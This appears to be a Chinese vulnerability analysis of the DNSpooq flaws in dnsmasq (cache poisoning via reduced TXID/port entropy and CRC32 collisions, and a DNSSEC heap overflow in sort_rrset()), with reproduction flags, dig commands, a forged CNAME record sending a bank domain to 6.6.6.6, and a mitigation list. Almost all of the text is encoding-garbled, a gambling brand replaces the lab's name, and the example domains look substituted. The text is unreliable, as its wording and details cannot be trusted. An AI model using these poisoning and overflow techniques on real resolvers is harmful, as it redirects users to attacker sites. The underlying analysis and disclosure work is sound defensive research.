DNSpooqϵÁзì϶·ÖÎöÓ븴ÏÖ

°ä²¼¹¦·ò 2021-02-01

ý½é


½üÆÚ £¬ÒÔÉ«Áа²È«Õ÷ѯÆóÒµJSOFÔÚ×îл㱨ÖÐÅû¶ÁËÆß¸ö DNSmasq ·ì϶£¨Í³³Æ DNSpooq£© £¬²¢Ö¸³ö¹¥»÷Õß½è´ËϰȾÁËÊýÒÔ°ÙÍò¼ÆµÄÉ豸¡£DNSmasq ÊÇÒ»Ì×Ê¢ÐеĿªÔ´ DNS ת·¢Èí¼þ £¬¿ÉÄÜΪÔËÐиÃÈí¼þµÄÍøÂçÉ豸Ôö³¤ DNS »º´æºÍ DHCP ·þÎñÆ÷Ö°ÄÜ £¬¿í·ºÓÃÓÚ¸÷ÀàÓ×Ð;ÖÓòÍøÂç¡£ÊÜ DNSpooq Ó°ÏìµÄÉ豸²»½ö¿ÉÄÜÔâ·ê DNS »º´æÖж¾ £¬»¹¿É±»ÓÃÓÚÔ¶³Ì´úÂëÖ´ÐÓ×¢»Ø¾ø·þÎñ£¨DoS£©¹¥»÷¡£Ä¿Ç°ÊÜÓ°ÏìµÄ³§ÉÌÔ̺¬µ«²»ÏÞÓÚ Android / Google¡¢¿µ¿¨Ë¹ÌØ¡¢Ë¼¿Æ¡¢ºìñ¡¢Netgear¡¢¸ßͨ¡¢Linksys¡¢IBM¡¢D-LinkÒÔ¼° Ubiquiti ¡£Æ¾¾ÝshodanÏÔʾ £¬Óг¬100Íǫ̀ÀûÓÃDNSmasqµÄÉ豸¶³öÔÚ¹«Íø £¬¿ÉÄÜÊÜÓ°ÏìµÄÉ豸²»¼ÆÆäÊý¡£


ÆäÖÐ £¬ CVE-2020-25684¡¢CVE-2020-25685 ºÍ CVE-2020-25686 ÕâÈý¸ö·ì϶ £¬¿ÉÄܵ¼Ö DNS ·þÎñÔâ·ê»º´æÖж¾¹¥»÷¡£Áí±íËĸö·ì϶Ϊ CVE-2020-25687¡¢CVE-2020-25683¡¢CVE-2020-25682 ºÍ CVE-2020-25681  £¬¾ùΪ»º³åÇøÒç¶Âí½Å¡£ºÚ¿Í»ò¿ÉÔÚÅäÖÃÁË DNSmasq µÄÍøÂçÉ豸ÉÏ £¬ÀûÓÃÕâЩ·ì϶Զ³ÌÖ´ÐÐËÁÒâ´úÂë¡£


DNSºÍ̸¼ò½é


DNSµÄÒªÇóºÍÏìÓ¦µÄ¸ù»ùµ¥ÔªÊÇDNS±¨ÎÄ£¨Message£©¡£ÒªÇóºÍÏìÓ¦µÄDNS±¨ÎĽṹÊÇÆëȫһÑùµÄ £¬Ã¿¸ö±¨ÎͼÓÉÒÔÏÂÎå¶Î£¨Section£©×é³É£º


1.png


DNS HeaderÊÇÿ¸öDNS±¨Îͼ±ØÐëÕ¼ÓеÄÒ»²¿ÃÅ £¬ËüµÄ³¤¶È¹Ì¶¨Îª12¸ö×Ö½Ú¡£Question²¿ÃÅ´æ·ÅµÄÊÇÏò·þÎñÆ÷²éÎʵÄÓòÃûÊý¾Ý £¬Í¨³£Çé¿öÏÂËüÖ»ÓÐÒ»ÌõEntry¡£Ã¿¸öEntryµÄÌåʽÊÇÒ»ÑùµÄ £¬ÈçÏÂËùʾ£º


2.png


QNAME£ºÓÉlabelsÐòÁÐ×é³ÉµÄÓòÃû¡£QNAMEµÄÌåʽʹÓÃDNS³ß¶ÈÃû³Æ°µÊ¾·¨¡£Õâ¸ö×Ö¶ÎÊDZ䳤µÄ £¬Òò¶øÓпÉÄܳÊÏÔìæÊý¸ö×Ö½Ú £¬µ«²»½øÐв¹Æë¡£DNSʹÓÃÒ»Öֳ߶ÈÌåʽ¶ÔÓòÃû½øÐбàÂë¡£ËüÓÉһϵÁеÄlabel£¨ºÍÓòÃûÖÐÓÃ.Ô׸îµÄlabel·ÖÆç£©×é³É¡£Ã¿¸ölabelÊ××ֽڵĸßÁ½Î»ÓÃÓÚ°µÊ¾labelµÄÀàÐÍ¡£RFC1035ÖзÖÅäÁËËĸöÀïÃæµÄÁ½¸ö £¬±ðÀëÊÇ£º00°µÊ¾µÄͨ³£label £¬11£¨0xC0£©°µÊ¾µÄѹËõlabel¡£


Answer £¬AuthorityºÍAdditionalÈý¸ö¶ÎµÄÌåʽÊÇÆëȫһÑùµÄ £¬¶¼ÊÇÓÉÁãÖÁ¶àÌõResource Record£¨×ÊÔ´¼Í¼£©×é³É¡£ÕâЩ×ÊÔ´¼Í¼ÓÉÓÚ·ÖÆçµÄÓô¦¶ø±»·Ö¸ô´æ·Å¡£Answer¶ÔÓ¦²éÎÊÒªÇóÖеÄQuestion £¬QuestionÖеÄÒªÇó²éÎÊÁ˾ֻáÔÚAnswerÖиø³ö £¬ÈôÊÇÒ»¸öÏìÓ¦±¨ÎĵÄAnswerΪ¿Õ £¬×¢Ã÷Õâ´Î²éÎÊûÓÐÖ±½Ó»ñµÃÁ˾Ö¡£


RR(ResourceRecord)×ÊÔ´¼Í¼ÊÇDNSϵͳÖм«¶È³ÁÒªµÄÒ»²¿ÃÅ £¬ËüÕ¼ÓÐÒ»¸ö±ä³¤µÄ½á¹¹ £¬¾ßÌåÌåʽÈçÏ£º


3.png


¡ñ NAME£ºËüÖ¸¶¨¸Ã±Ê¼Í¼¶ÔÓ¦µÄÊÇÄĸöÓòÃû £¬ÌåʽʹÓÃDNS³ß¶ÈÃû³Æ°µÊ¾·¨

¡ñ TYPE£º×ÊÔ´¼Í¼µÄÀàÐÍ¡£

¡ñ CLASS£º¶ÔÓ¦QuestionµÄQCLASS £¬Ö¸¶¨ÒªÇóµÄÀàÐÍ £¬³£ÓÃֵΪIN £¬ÖµÎª0x001¡£

¡ñ TTL(Time To Live)×ÊÔ´µÄÓÐЧÆÚ£º°µÊ¾ÄãÄܹ»½«¸ÃÌõRR»º´æTLLÃë £¬TTLΪ0°µÊ¾¸ÃRR²»Äܱ»»º´æ¡£TTLÊÇÒ»¸ö4×Ö½ÚÓзûºÅÊý £¬µ«ÊÇֻʹÓÃËü´óÓÚµÅ×Ú0µÄ²¿ÃÅ¡£

¡ñ RDLENGTH£ºÒ»¸öÁ½×ֽڷǸºÕûÊý £¬ÓÃÓÚÖ¸¶¨RDATA²¿Ãŵij¤¶È£¨×Ö½ÚÊý£©¡£

¡ñ RDATA£º°µÊ¾Ò»¸ö³¤¶ÈºÍ½á¹¹¶¼¿É±äµÄ×Ö¶Î £¬ËüµÄ¾ßÌå½á¹¹È¡¾öÓÚTYPE×Ö¶ÎÖ¸¶¨µÄ×ÊÔ´ÀàÐÍ¡£

   DNS³£¼û×ÊÔ´¼Í¼ÀàÐÍÓÐNS¼Í¼¡¢A¼Í¼¡¢CNAME¼Í¼¡£

¡ñ NS¼Í¼

NS¼Í¼ÓÃÓÚÖ¸¶¨Ä³¸öÓòµÄȨÍþDNS¡£ºÃ±ÈÔÚcomµÄDNSÀï £¬¼Í¼×Åhttp://m.wangyinli.comÕâ¸öÓòµÄDNS £¬»òÐíÈçÏ£º

m.wangyinli.com.  NS ns1.m.wangyinli.com. 

m.wangyinli.com.  NS ns2.m.wangyinli.com. 

m.wangyinli.com.  NS ns3.m.wangyinli.com.


ÕâÈý±Ê¼Í¼ £¬¾ÍÊÇ˵http://ns1.m.wangyinli.com¡¢http://ns2.m.wangyinli.com¡¢http://ns3.m.wangyinli.com£¨ÒÔϼò³Æns1¡¢ns2¡¢ns3£©¶¼ÊÇhttp://m.wangyinli.comÓòµÄȨÍþDNS £¬Ñ¯ÎÊËÁÒâÆäÖÐÒ»¸ö¶¼Äܹ»¡£


µ±È» £¬ÔÚcomµÄȨÍþDNSÀï £¬»¹»á¼Í¼ns1~ns3Õ⼸¸öhttp://m.wangyinli.comȨÍþDNSµÄIP £¬»áÒ»²¢·µ»Ø¸øÎÊѯÕß £¬ÒÔ±ãÎÊѯÕßÖ±½ÓÓÃIPÁªÏµns1~ns3¡£


¡ñ A¼Í¼


A¼Í¼¾ÍÊÇ×î¾­µäµÄÓòÃûºÍIPµÄ¶ÔÓ¦ £¬ÔÚhttp://ns1.m.wangyinli.comÀïÃæ £¬¼Í¼×Űٶȹ«Ë¾¸÷²úÆ·µÄÓòÃûºÍIPµÄ¶ÔÓ¦¹ØÏµ £¬Ã¿Ò»¸öÕâÑùµÄ¼Í¼ £¬¾ÍÊÇÒ»¸öA¼Í¼ £¬ºÃ±ÈÏÂÃæµÄ3¸öA¼Í¼£º


image.m.wangyinli.com   A    1.2.3.4 

wenku.m.wangyinli.com   A    5.6.7.8 

tieba.m.wangyinli.com     A    9.10.11.12


ÈôÊÇÓû§Ñ¯ÎÊhttp://ns1.m.wangyinli.com£º¡°http://wenku.m.wangyinli.comµÄIPÊǼ¸¶à  £¿¡± £¬ns1¾Í»áÕÒµ½¶ÔÓ¦µÄA¼Í¼»òÕßCNAME¼Í¼²¢·µ»Ø¡£


¡ñ CNAME¼Í¼


CNAME¼Í¼Ҳ³Æ±ðºÅ¼Í¼ £¬ÔÊÐí½«¶à¸ö¼Í¼ӳÉäµ½Í³Ò»Ì¨ÍÆËã»úÉÏ¡£ºÃ±È £¬ÔÚns1ÖÐ £¬²¢Ã»ÓÐhttp://www.m.wangyinli.comµÄA¼Í¼ £¬¶øÊÇÒ»¸öCNAME¼Í¼£º


www.m.wangyinli.com  CNAME  www.a.shifen.com


Ò²¾ÍÊÇ֪ͨÓû§ £¬http://www.m.wangyinli.comµÄ±ðºÅÊÇhttp://www.a.shifen.com £¬Äܹ»Ö±½ÓÒªÇó½âÎöhttp://www.a.shifen.com¡£


DNS»º´æ¹¥»÷


µ±½Ó¼ûwww.m.wangyinli.comʱ £¬ÓòÃû½âÎöµÄ´óÌåÁ÷³ÌÈçÏÂͼËùʾ¡£


4.png


DNS»º´æÖж¾ÊÇÒ»ÖÖ±ÈÁ¦¾­µäµÄ¹¥»÷·½Ê½ £¬ÈôÊǹ¥»÷ÕßÄܹ»³É¹¦Ö´ÐÐ £¬¾Í»áÔÚDNS»º´æ·þÎñÆ÷ÉÏÁôÏÂÒ»¸öÓꦵÄÌõ¿î £¬Ê¹µÃÓû§½Ó¼ûÕý³£ÍøÕ¾µÄÒªÇó³Á¶¨Ïòµ½±»¹¥»÷Õß½ÚÔìµÄ¶ñÒâÍøÕ¾¡£


DNSpooqϵÁлº´æÖж¾·ì϶µÄµ¥Ò»¹¥»÷Á÷³ÌͼÈçÏÂͼËùʾ£º


5.png


£¨1£©Óû§·¢ËÍä¯ÀÀÌÔ±¦µÄÒªÇó¸øDNSת·¢Æ÷ £¬µ«Ô¸µÃµ½¶ÔÓ¦µÄIP¡£

£¨2£©DNSת·¢Æ÷ûÓдËÓòÃûµÄ»º´æ £¬ËùÒÔ½«ÒªÇóת·¢¸øÉÏÓÎDNS·þÎñÆ÷¡£

£¨3£©Ôڵõ½ÉÏÓÎDNS·þÎñÆ÷»Ø¸´Ç° £¬¹¥»÷Õß·¢ËÍÒ»¸öαÔìµÄ»Ø¸´ £¬½«ÌÔ±¦ÓòÃûÓëÒ»¸ö¶ñÒâIPÏà¶ÔÓ¦¡£

£¨4£©DNSת·¢Æ÷½ÓÊÜÁËÕâ¸öαÔìµÄ»Ø¸´ £¬²¢·¢Ë͸øÓû§ £¬Òò¶øÓû§ÒªÇó½Ó¼ûµÄÌÔ±¦±»³Á¶¨Ïòµ½Á˹¥»÷Õ߰ѳֵĶñÒâÍøÕ¾¡£


Õâ¸öDNSת·¢Æ÷ÀûÓó¡¾°ºÜ¿í·º £¬ºÃ±ÈÓ×ÎÒ¿ªµÄÈȵã £¬»ú³¡¡¢±ö¹ÝÀïµÄ¹«¹²ÍøÂçµÈ £¬Ò»µ©¹¥»÷³É¹¦ £¬ÔòÓ°ÏìʹÓÃÕâÐ©ÍøÂçµÄËùÓÐÈË¡£


ÔÚDNS HeaderÖÐÓÐÒ»¸ö16-bitµÄÇøÓò½ÐTXID£¨transaction ID£© £¬ÓÃÓÚ½«²éÎʰüºÍ»Ø¸´°üÆ¥Åä¡£ÔÚ´Óǰ £¬TXIDÊÇ·ÀÓùDNS»º´æÖж¾µÄ³ÁÒª¼¿Á©¡£µ«ÊÇÔÚ2008Äê £¬°²È«×êÑÐÔ±Dan KaminskyÖ¤Ã÷16-bitµÄTXIDÊÇÔ¶Ô¶²»¹»µÄ £¬ºóÀ´ÓÖÔö³¤Á˶˿ÚËæ»ú»¯ £¬ËùÒÔÕâ¸öʱ³½ÏëαÔì»Ø¸´°ü £¬²»½ö±ØÒª²Â¶ÔTXID £¬»¹±ØÒª²Â¶Ô¶Ë¿Ú £¬Ò»¹²32λµÄËæ»úÖµ £¬´Ë±í»¹±ØÒªÖªÂ·Ô´IPºÍÖ÷ÕÅIP¡£


DNS°²È«À©´ó


µ½ÁË21ÊÀ¼Í £¬DNS°²È«À©´óÔÚ±»ÂýÂýÀûÓá£DNS°²È«À©´óÊÇĿǰΪÏàʶ¾öDNSºýŪ»ººÍ´æ´«È¾ÎÊÌâ¶øÉè¼ÆµÄÒ»ÖÖ°²È«»úÔì¡£DNSSECÒÀ¸½Êý×ÖÊðÃûÀ´±£ÕÏDNSÓ¦´ð±¨ÎĵÄÕæÊµÐÔºÍÆëÈ«ÐÔ¡£µ¥Ò»À´Ëµ £¬È¨Íþ·þÎñÆ÷ʹÓÃ˽Կ¶Ô×ÊÔ´¼Í¼½øÐÐÊðÃû £¬µÝ¹é·þÎñÆ÷ÀûÓÃȨÍþ·þÎñÆ÷µÄ¹«Ô¿¶ÔÓ¦´ð±¨ÎĽøÐÐÑéÖ¤¡£ÈôÊÇÑé֤ʧ°Ü £¬Ôò×¢Ã÷ÕâÒ»±¨ÎÄ¿ÉÄÜÊÇÓÐÎÊÌâµÄ¡£


ΪÁËʵÏÖ×ÊÔ´¼Í¼µÄÊðÃûºÍÑéÖ¤ £¬DNSSECÔö³¤ÁËËÄÖÖÀàÐ͵Ä×ÊÔ´¼Í¼£ºRRSIG£¨Resource Record Signature£©¡¢DNSKEY£¨DNS Public Key£©¡¢DS£¨Delegation Signer£©¡¢NSEC£¨Next Secure£©¡£


ÀýÈçÎÒÃÇÖ´ÐкÅÁîÐУºdig @8.8.8.8 paypal.com £¬µÃµ½µÄDNS²éÎÊÁ˾ÖÈçÏÂËùʾ£º


6.png


ºì¿òÖÐΪӦ´ð²¿ÃÅ £¬ÕâÊÇ먦ÆôDNSSECµÄÇé¿öϵÄ¡£ÎÒÃÇÖ´ÐкÅÁîÐУºdig+dnssec @8.8.8.8 paypal.com £¬µÃµ½µÄDNS²éÎÊÁ˾ÖÈçÏÂËùʾ£º


7.png


À¶¿òÖоÍÊÇRRSIG×ÊÔ´¼Í¼´æ´¢ £¬¸Ã×ÊÔ´¼Í¼´æ´¢µÄÊǶÔ×ÊÔ´¼Í¼¼¯ÖУ¨RRSets£©µÄÊý×ÖÊðÃû¡£


Dnsmasq»º´æÖж¾·ì϶


ÒÔÏÂÈý¸ö·ì϶ £¬×éºÏÆðÀ´ÓÃÄܹ»½µµÍαÔì»Ø¸´°üµÄìØÖµ¡£


¡ñ CVE-2020-25684


DNSmasq×ÔÉíÏÞ¶ÈÁËת·¢¸øÉÏÓηþÎñÆ÷²éÎʰüµÄÊýÁ¿ £¬Í¨³£×î´óÊÇ150Ìõ¡£Óû§Äܹ»×Ô¼ºÉ趨Õâ¸öÖµ¡£×ª·¢²éÎÊʹÓõÄÊÇfrec(forwardrecord)½á¹¹¡£Ã¿¸öfrec¶¼ºÍTXIDÓйØÁª¡£µ±»Ø¸´±»½ÓÊÜ»ò¾­¹ýÒ»°´¹¦·ò £¬Õâ¸öfrecs¾Í»á±»É¾³ý¡£


ͨ³£Çé¿öÏ £¬ÓÃÓÚת·¢²éÎʵÄsocketÊýÁ¿±»ÏÞ¶ÈÔÚ64¸ö¡£Ã¿¸öÓÃÓÚת·¢µÄsocketºÍÒ»¸öËæ»úµÄ¶Ë¿Ú°ó¶¨¡£

ÀíÂÛÉÏ £¬²éÎʰüÖÐTXIDºÍÔ´¶Ë¿Ú¼ÓÆðÀ´»áÓÐ32-bitµÄìØ¡£µ«ÊÇÏÖʵÉÏ £¬Õâ¸öìØÒª¸üÉÙһЩ¡£ÓÉÓÚdnsmasqÔÚͳһ¸ö¶Ë¿Ú»á¶à·¸´Óöà¸öTXID £¬¶øÃ»Óн«Ã¿¸öTXIDºÍÿ¸ö¶Ë¿ÚÉèÖÃΪÖðÒ»¶ÔÓ¦µÄ¹ØÏµ £¬ÈçÏÂͼËùʾ¡£Á˾־ÍÊÇ £¬¹¥»÷ÕßÖ»±ØÒª²ÂÖÐ64¸ö¶Ë¿ÚÖеÄÒ»¸ö¶Ë¿Ú»¹ÓÐÕýÈ·µÄTXID¾ÍÄܹ»ÁË £¬¶ø²»ÓòÂÖÐij¸öÌØ¶¨µÄ¶Ë¿ÚºÍÌØ¶¨µÄTXID¡£ËùÒÔÕâµ¼ÖÂÏÖʵÉÏÖ»ÓÐ26λìØÖµ¡£


8.png


¡ñ CVE-2020-25685


ÈôÊÇÒª¶ÔDNSת·¢Æ÷½øÐÐͶ¶¾ £¬³ýÁ˱ØÒª²Â¶ÔÕýÈ·µÄTXIDºÍÔ´¶Ë¿Ú £¬¹¥»÷Õß·¢ËÍαÔìµÄ»Ø¸´»¹±ØÒªÆ¥ÅäÒÑÊ¢¿ªµÄfrecs¡£ÈôÊÇÏëÈÃfrecÆ¥Åä £¬ÄÇôTXIDºÍÎÊÌâÇø¶¼ÒªÆ¥Åä £¬»»¾ä»°Ëµ £¬»Ø¸´µÄÄÚÈÝÊÇ֮ǰѯÎʹýµÄ¡£


dnsmasqÖ»´æ·ÅÎÊÌâÇøµÄ¹þÏ£Öµ £¬¶ø²»ÊǰÑÕû¸öÓï¾ä´æÏÂÀ´¡£µ¹Øû¸ö²éÎÊÌá½»µÄʱ³½ £¬Õâ¸ö¹þÏ£Öµ»á±»±£Áô¡£


ÈôÊÇdnsmasqûÓбàÒëDNSSECÖ§³Ö £¬ÄÇôËûĬÈÏʹÓÃCRC32×÷Ϊ¹þÏ£Ëã·¨¡£ÎÊÌâ¾ÍÔÚÓÚCRC32´ÓÃÜÂëѧ½Ç¶È²¢²»ÊÇÒ»¸ö°²È«µÄËã·¨¡  £Äܹ»ºÜÇáËɵÄʹÓÃÀàËÆSMT solverµÈ¹¤¾ß½øÐÐCRC32Åöײ £¬ÕâÀïµÀÀí²»×ö¹ý¶à½éÉÜ¡£


ËùÒÔ»ùÓÚÕâÒ»¸öÐÔ £¬¹¥»÷ÕßÄܹ»ÌìÉú¶à¸ö²éÎÊ £¬Ã¿Ò»¸ö²éÎʵÄCRC32µÄÖµ¶¼Ò»Ñù £¬²»Íâ²éÎʵÄÊÇ·ÖÆçµÄÓòÃû £¬¶øÕâЩÓòÃû×îºÃÊDz»´æÔÚµÄ £¬¼´Ã»Óб»»º´æµÄ¡£¶øºó¹¥»÷ÕßÄܹ»·¢ËÍÒ»¸öÓµÓÐÒ»ÑùCRC32ÖµµÄαÔìµÄ»Ø¸´¡£


ÈçÏÂͼËùʾ £¬¹¥»÷Õß½ÚÔìһ̨¿Í»§¶Ë¶Ô¶à¸öÓòÃûÌáÒéÎÊѯ £¬Ã¿Ò»¸öCRC32µÄÖµ¶¼ÊÇÒ»ÑùµÄ £¬¶øºóÔڵݹéDNS·þÎñÆ÷»Ø¸´Ö®Ç° £¬»Ø¸´Ò»¸öÓµÓÐÒ»ÑùCRC32ÖµµÄÓòÃû»òIP £¬¹¥»÷¼´ÓпÉÄܳɹ¦¡£


9.png


¡ñ CVE-2020-25686


dnsmasqµÄÁíÒ»¸öÎÊÌâ¾ÍÊÇÔÚͳһ¸öÓòÃû±»²éÎÊÒªÇóʱ»á´Ö³µÄ´´½¨¶à¸öfrecs¡£Ëæºó»áת·¢ËùÓеÄÒªÇó £¬ÈôÊdzɹ¦µÄÆ¥ÅäÆäÖеÄËÁÒâÒ»¸ö £¬¾Í¼ÆÈ뻺´æ¡£Õâ¸öÎÊÌâµ¼Ö¾ÍËãdnsmasqʹÓð²È«µÄ¹þÏ£Ëã·¨ £¬Ò²¿ÉÄܳɹ¦µÄÖ´Ðй¥»÷¡£


ͨ¹ýÒÔÉÏÈý¸ö·ì϶ £¬µ¼Ö¹¥»÷ÕßαÔì¶ñÒâ»Ø¸´°üµÄ³É¹¦ÂÊ´ó´óÌá¸ß £¬ºóÃæ»¹±ØÒªÀûÓÃdnsmasqûÓжԻظ´°ü×öÑéÖ¤µÄ¸öÐÔ½øÐй¥»÷¡£


ͨ³£Çé¿öÏ £¬Ôڵݹé·þÎñÆ÷ÉÏ»á¶Ô»Ø¸´°ü×öһЩÑéÖ¤»úÔì £¬ÀýÈçbailiwicks¡£µ«ÊÇÔÚÅäÖÃdnsmasqµÄÉ豸Éϲ¢Ã»ÓÐ×öÈκÎÑéÖ¤ £¬ËùÒÔÄܹ»ÔÚÓû§ÒªÇówww.example.comµÄʱ³½ £¬¹¥»÷ÕßÄܹ»·¢ËÍÈçÏ»ظ´:


www.example.com  CNAME  www.bank.com

www.bank.com           A         6.6.6.6


¶øºóÕâ±Ê¼Í¼µÄ»º´æ¾Í»á±»²åÈëµ½dnsmasqµÄÉ豸ÖС£Ç°ÎĽéÉܹýCNAME £¬ËùÒÔµ±Óû§Ïë½Ó¼ûwww.bank.comµÄʱ³½ £¬»á±»³Á¶¨Ïòµ½±»¹¥»÷Õß½ÚÔìµÄIPΪ6.6.6.6µÄ·þÎñÆ÷¡£¶øÅäÖÃÁËÀàËÆbailiwicksµÄÉ豸 £¬»áÈ¥ÕÒȨÍþ·þÎñÆ÷ѯÎÊwww.bank.comµÄIP¡£


Dnsmasq»º³åÇøÒç¶Âí½Å



¡ñ CVE-2020-25681


ÒÔÏÂÃû³ÆÒԹ淶µÄDNSÃû³Æ°¤´ÎÅÅÐò¡£×î³ÁÒªµÄ±êÇ©ÊÇ¡°example¡±¡£Ôڴ˼¶±ðÉÏ £¬¡°example¡±½«Ê×ÏÈÅÅÐò £¬¶øºóÊÇÒÔ¡°a.example¡±½áβµÄÃû³Æ £¬¶øºóÊÇÒÔ¡°z.example¡±½áβµÄÃû³Æ¡£Ã¿¸ö¼¶±ðÖеÄÃû³ÆÒÔÒ»ÑùµÄ·½Ê½ÅÅÐò¡£ÈçÏÂͼËùʾ¡£


10.png


CVE-2020-25681·ì϶λÓÚdnssec.cÎļþµÄsort_rrset()º¯ÊýÖÐ £¬¸Ãº¯ÊýÕÆ¹ÜÒÀÕÕDNSSECÑéÖ¤¹ý³ÌµÄÒªÇóѡȡðÅÝÅÅÐòËã·¨½«¸ø¶¨µÄ×ÊÔ´¼Í¼¼¯ÖУ¨RRSets£©ÅÅÐòΪ¹æ·¶°¤´Î¡£¸Ãº¯Êý½ç˵ÈçÏ£º


11.png


Ëü½ÓÊÜÁËÏìÓ¦Êý¾Ý°ü£¨header£©ÒÔ¼°Êý¾Ý°ü³¤¶È£¨plen£©¡£rrsetÊÇÖ¸Ïò×ÊÔ´¼Í¼¼¯ÖÐÖÐRRÊý×éµÄÖ¸Õë £¬¶ørrsetidxÊǼ¯ÖÐÖеÄRRÊý £¬rr_descÊÇÖ¸ÏòÓëRRset¹ØÁªµÄRRÀàÐ͵ÄÃèÊö·ûµÄÖ¸Õë¡£×îºó £¬ÓÐÁ½¸ö»º³åÇøbuff1ºÍbuff2 £¬ËüÃÇÓÃ×÷ÅÅÐòÀý³ÌµÄ¹¤×÷Çø»º³åÇø¡£ÕâÁ½¸ö»º³åÇøÔÚ·¨Ê½Æðͷʱ¶¼ÊÇÏà¶Ô·ÖÅäµÄ £¬ËüÃÇÊÇdaemon> workspacenameºÍdaemon-> keyname¡£µ±dnsmasq¿ªÆôDNSSECʱ £¬½«»á·ÖÅäÕâÁ½¸ö»º³åÇø¡£


12.png


MAXDNAME´óÓ×Ϊ1025 £¬ËùÒÔworkspacenameºÍkeynameµÄ´óÓ×2050 £¬Ò²ÊǸ÷ì϶²úÉúÒç³öµÄ»º³åÇø¡£


Ê×ÏÈÆô¶¯dnsmasq £¬²¢ÉèÖòÎÊýΪ£º

-p 53535 --no-daemon --log-queries -S127.0.0.2 --no-hosts --no-resolv -d -q --dnssec--trust-anchor=.,20326,8,2,E06D44B80B8F1D39A95C0B0D7C65D08458E880409BBC683457104237C7F8EC8D £¬»ú¹ØÍê¶ñÒâDNS²éÎÊÏìÓ¦°ü £¬Ê¹ÓúÅÁîÐУºdig NS+dnssec @localhost -p 53535 . £¬ÉäÖÐsort_rrset()º¯Êý¶ÏµãºóÈçÏÂͼËùʾ£º


13.png


ÔÚ»ú¹Ø×ÊÔ´¼Í¼¼¯ÖУ¨RRSets£©Ê± £¬±ØÐë±£Õϼͼ¸öÊý´óÓÚ1 £¬ÕâÑùÄÜÁ¦±£ÕϽøÈëÅÅÐòÑ­»·¡£


ÕâÀï»ú¹ØµÄrrsetidxΪ0x3¡£


14.png


Õý³£Êý¾Ý°üÈçÏÂͼËùʾ£º


15.png


Answers¿éÖÐ £¬p1Ö¸ÏòµÚÒ»¸ö×ÊÔ´¼Í¼ £¬p2Ö¸ÏòµÚ¶þ¸ö £¬¶øºó½øÐÐÅÅÐò¡£


16.png


±ðÀëÌø¹ýClass £¬TypeºÍTTL £¬´ïµ½RDATAÇøÓò¡£


17.png


Data lenghΪ20 £¬ÎªName ServerµÄ³¤¶È¡£¶øºó½øÈëÅÅÐòÑ­»·¡£


18.png


ÐÐ315 £¬Ê×ÏÈŲÓÃget_rdata()º¯Êý½âÎöµÚÒ»¸ö×ÊÔ´¼Í¼p1µÄRDATAÓòÖеÄNameServer £¬¿´Ï¸ú¯ÊýʵÏÖ¡£


19.png


ÅжÏdÊÇ·ñµÅ×Ú-1 £¬ÕâÀï²»µÅ×Ú £¬²»½øÈëifÓï¾ä £¬À´µ½ÈçÏ´úÂë¡£


20.png


¶øºóŲÓÃextract_name()º¯Êý½âÎö £¬ÕâÀï±ØÒª±£ÕÏextract_name()º¯Êý½âÎöÃýÎó·µ»Ø0 £¬±£ÕϽøÈëget_rdata()º¯Êý·µ»ØÎª0 £¬Í¨¹ýÉèÖ󬳤NameServer×Ö·û´®¼´¿É¡£


21.png


½øÈëifÓï¾ä £¬ÐÐ318 £¬ÍÆËãlen1 £¬Îªend1-p1 £¬¼´ÊÇNameServerµÄ³¤¶È¡£ÐÐ319 £¬Å²ÓÃmemcpy()½«p1¿½±´µ½buff1+left1ÖС£


22.png


ÕâÀïlen1ÉèÖÃΪ3550 £¬p1ΪNameServer £¬³¤¶ÈRDLENGTHΪÓû§¿É¿Ø¡£Ç°ÎÄÒѾ­½éÉÜbuff1Ϊdaemon>workspacename £¬´óÓ×Ϊ2020 £¬Òò¶ø²úÉú¶ÑÒç³ö¡£


23.png


»º½â´ëÊ©


¡ñ Éý¼¶dnsmasqµ½×îа汾(2.83¼°ÒÔÉÏ) £¬ÕâÊÇĿǰ×îÓÐЧµÄ²½Öè¡£

¡ñ ÈôÊDz»ÓÃÒª £¬ÅäÖÃdnsmasqÉ豸²»ÒªÔÚWAN¿Ú¼àÌý¡£

¡ñ  ¾¡Á¿ÅäÖÃdnsmasq×î´óת·¢²éÎÊÌõ¿îÓ×Ò»µã¡£

¡ñ ÁÙʱ¹Ø¹ØDNSSECÑé֤ѡÏî¡£

¡ñ Ê¹ÓÃΪDNSÌṩ´«Ê䰲ȫµÄºÍ̸ £¬ÈçDoT»òDoH¡£


²Î¿¼Á´½Ó£º


[1] https://www.jsof-tech.com/disclosures/dnspooq/

[2] https://www.jsof-tech.com/wp-content/uploads/2021/01/DNSpooq-Technical-WP.pdf

[3] https://www.rfc-editor.org/rfc/rfc1664.txt

[4] https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html

[5] https://spoofer.caida.org/summary.php

[6] https://www.rfc-editor.org/rfc/rfc7858.txt

[7] https://www.rfc-editor.org/rfc/rfc5452.txt

[8] http://www.thekelleys.org.uk/dnsmasq/doc.html

[9]https://dl.acm.org/doi/10.1145/3372297.3417280

[10] https://github.com/Z3Prover/z3

[11] https://www.chromium.org/developers/design-documents/dns-prefetching

[12] https://www.rfc-editor.org/rfc/rfc4033.txt

[13] https://zhuanlan.zhihu.com/p/92899876


mansion88Ã÷Éý»ý¼«·ÀÓù³¢ÊÔÊÒ£¨ADLab£©


ADLab³ÉÁ¢ÓÚ1999Äê £¬ÊÇÖйú°²È«ÐÐÒµ×îÔç³ÉÁ¢µÄ¹¥·À¼¼Êõ×êÑг¢ÊÔÊÒÖ®Ò» £¬Î¢ÈíMAPP´òËãÖ÷Ìâ³ÉÔ± £¬¡°ºÚȸ¹¥»÷¡±¸ÅÏëÊ×ÍÆÕß¡£½ØÖ¹Ä¿Ç° £¬ADLabÒÑͨ¹ýCVEÀۼư䲼°²È«·ì϶½ü1100¸ö £¬Í¨¹ý CNVD/CNNVDÀۼư䲼°²È«·ì϶1000Óà¸ö £¬³ÖÐøÎ¬³Ö¹ú¼ÊÍøÂ簲ȫÁìÓòÒ»Á÷Ë®×¼¡£³¢ÊÔÊÒ×êÑз½Ïòº­¸Ç²Ù×÷ϵͳÓëÀûÓÃϵͳ°²È«×êÑÓ×¢ÖÇÄÜÖն˰²È«×êÑÓ×¢ÎïÁªÍøÖÇÄÜÉ豸°²È«×êÑÓ×¢Web°²È«×êÑÓ×¢¹¤¿ØÏµÍ³°²È«×êÑÓ×¢ÔÆ°²È«×êÑС£×êÑгɾÍÀûÓÃÓÚ²úÆ·Ö÷Ìâ¼¼Êõ×êÑÓ×¢¹ú¶È³Áµã¿Æ¼¼ÏîÄ¿¹¥¹Ø¡¢×¨Òµ°²È«·þÎñµÈ¡£


adlab.jpg